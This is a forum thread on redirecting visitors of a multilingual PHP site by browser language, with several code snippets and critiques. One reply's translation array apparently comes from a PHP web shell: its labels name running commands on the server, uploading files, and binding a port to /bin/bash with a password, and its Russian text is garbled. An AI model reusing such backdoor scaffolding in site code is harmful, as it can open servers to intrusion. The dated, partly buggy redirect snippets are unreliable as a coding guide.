xisto Community
Alexandre Cisneiros

Multilingual Site: Send The User To Page Of Choice

If you have one site in diferent laanguages, this simple script can redirect the user to the correct page acording to his/her language:

<?php // Enslish EUA elseif ($HTTP_ACCEPT_LANGUAGE == "en-us"){ header("Location: index_eng.html"); } // InglĂŞs UK elseif ($HTTP_ACCEPT_LANGUAGE == "en-gb"){ header("Location: ingles_enuk.html"); } // Portuguese [Brazil] if ($HTTP_ACCEPT_LANGUAGE == "pt-br"){ header("Location: index_ptbr.html"); } //German elseif ($HTTP_ACCEPT_LANGUAGE == "de-de"){ header("Location: index_ger.html"); } // Swedish elseif ($HTTP_ACCEPT_LANGUAGE == "sv-se"){ header("Location: index_swe.html"); } // French elseif ($HTTP_ACCEPT_LANGUAGE == "fr-fr"){ header("Location: index_fre.html"); } // Chineseelseif ($HTTP_ACCEPT_LANGUAGE == "zh-cn"){ header("Location: index_chi.html"); } // Thai elseif ($HTTP_ACCEPT_LANGUAGE == "th-th"){ header("Location: index_tha.html"); } ?> 

-----This is not a full tutorial, but just a little code snippet. Moved from [Tutorials > Programming > PHP] to [Programming > Scripting > PHP]-----szupie

Now i saw that EDIT is disabled, so this is a correction:

CHANGE THE FIRSTS 3 IF's to this:///////////////////////////////////////////////////////<?php // Enslish EUA if ($HTTP_ACCEPT_LANGUAGE == "en-us"){ header("Location: index_eng.html"); } // InglĂŞs UK elseif ($HTTP_ACCEPT_LANGUAGE == "en-gb"){ header("Location: ingles_enuk.html"); } // Portuguese [Brazil] elseif ($HTTP_ACCEPT_LANGUAGE == "pt-br"){ header("Location: index_ptbr.html"); } ////////////////////////////////////////////////////////THE REST IS OK.

Edited by miCRoSCoPiC^eaRthLinG (see edit history)

What about if I do not want to go to my browser set language ? and have you seen what kind of ACCEPT LANGUAGE most of the browsers send ? I usually set a lot, like, how would your script work with this ?"en,lt;q=0.9,ru;q=0.8,de;q=0.7" ?And using header is the last thing in this kind of type of script I would use. :)

Instead of using a bunch of elseif statements why not a CASE in a switch or even better, why not just have a drop down box or graphics that allow a user to choose the language themselves? The reason you should not attempt to send some one to a particular language would be that they are on a computer that might not be their own and possibly if they are in another country while using that computer. On my sites you have 33 Flags representing 33 various languages that the user selects when coming to the site, and in my forums they can choose from 20 languages including English with two forms of Chinese and two forms of German. There they must of course choose the language themselves, but of course this is only if they are members since the only way to change your profile is to be a member.

Instead of using a bunch of elseif statements why not a CASE in a switch or even better, why not just have a drop down box or graphics that allow a user to choose the language themselves?

Ok. Here is it:

switch ($HTTP_ACCEPT_LANGUAGE) {case "en-us": header("Location: index_eng.html");break;case "en-uk": header("Location: index_enuk.html");break;case "pt-br": header("Location: index_ptbr.html");break;}// ETC......

The reason you should not attempt to send some one to a particular language would be that they are on a computer that might not be their own and possibly if they are in another country while using that computer. On my sites you have 33 Flags representing 33 various languages that the user selects when coming to the site, and in my forums they can choose from 20 languages including English with two forms of Chinese and two forms of German. There they must of course choose the language themselves, but of course this is only if they are members since the only way to change your profile is to be a member.

[1064337012[/snapback]

You can add it on the site. Example:

AFTER REDIRECT, YOU CAN OUT THIS ON EACH PAGE:

//////////////////////////////////

Choose your language: [ box with langueages] [ Ok button]

Actually, the way of redirect is quite a silly and takes a lot of place on the server.

to put that select box, when user gives his value,

<?php   $lang=array(		   'ru_text1' => 'ĂÝïÎÍíüííàÿ êÎÏàíäà',		   'ru_text2' => 'ĂÝïÎÍíüíèü êÎÏàíä Ă­Ă  ùüðâüðü',		   'ru_text3' => 'ĂÝïÎÍíèòß êÎÏàíäó',		   'ru_text4' => 'ĂàåÎáàÿ äèðüêòÎðèÿ',		   'ru_text5' => 'Ăàãðóçêà ôàÊÍÎâ Ă­Ă  ùüðâüð',		   'ru_text6' => 'ĂÎêàÍßíÝÊ Ă´Ă ĂŠĂŤ',		   'ru_text7' => 'ĂÍèàùÝ',		   'ru_text8' => 'ĂÝåüðèòü àÍèàù',		   'ru_butt1' => 'ĂÝïÎÍíèòß',		   'ru_butt2' => 'Ăàãðóçèòß',		   'ru_text9' => 'ĂòêðÝòèü ïÎðòà è ïðèâÿçêà ĂĽĂŁĂŽ ĂŞ /bin/bash',		   'ru_text10' => 'ĂòêðÝòß ïÎðò',		   'ru_text11' => 'ĂĂ Ă°ĂŽĂŤĂź äÍÿ äÎùòóïà',		   'ru_butt3' => 'ĂòêðÝòß',		   'eng_text1' => 'Executed command',		   'eng_text2' => 'Execute command on server',		   'eng_text3' => ' Run command',		   'eng_text4' => 'Work directory',		   'eng_text5' => 'Upload files on server',		   'eng_text6' => 'Local file',		   'eng_text7' => 'Aliases',		   'eng_text8' => 'Select alias',		   'eng_butt1' => 'Execute',		   'eng_butt2' => 'Upload',		   'eng_text9' => 'Bind port to /bin/bash',		   'eng_text10' => 'Port',		   'eng_text11' => 'Password for access',		   'eng_butt3' => 'Bind'		   );//etc//$language is choice of the user   print "$$language_text1;//etc?>

And print it when needed.

Why not just listen to W3C Standards for the correct method of doing this without any dynamic scripting involved. It makes sense considering there's tonnes of languages, that to write a line of code for each one, does not make any sense. If you develop alternative pages in different languages then I suggest you read W3C on how it should be handled and not rely on what device connects to you, because it's possible they don't have an ACCEPT_LANGUAGE and you have not set a default for if it doesn't match. Also what someone said with the ACCEPT_LANGUAGE having a mixed string, since you can have it set up by preference, including the language that you prefer, but if you're not checking for their preferred language and only one that they've set, then you're definitely better off using W3C's way.$HTTP_ vars are old, learn what's now and not in the past, no point in continuing with something deprecated.The new variable is $_SERVER['HTTP_ACCEPT_LANGUAGE'];Cheers,MC

Hi, one of my clients need to translate his website to english -is in spanish- because he wants to capture more clients, so after investigating and testing different solutions i find that the simplest way to do this is by using a session variable that holds the default/user language, some files for each translation and the use of associative arrays.

If someone wants to see this in action go to: Refugio de Santiago - New, is not finished yet and any comments or sugestions are welcome.

BTW i dont try the W3C standards, i gonna see later.

best regards,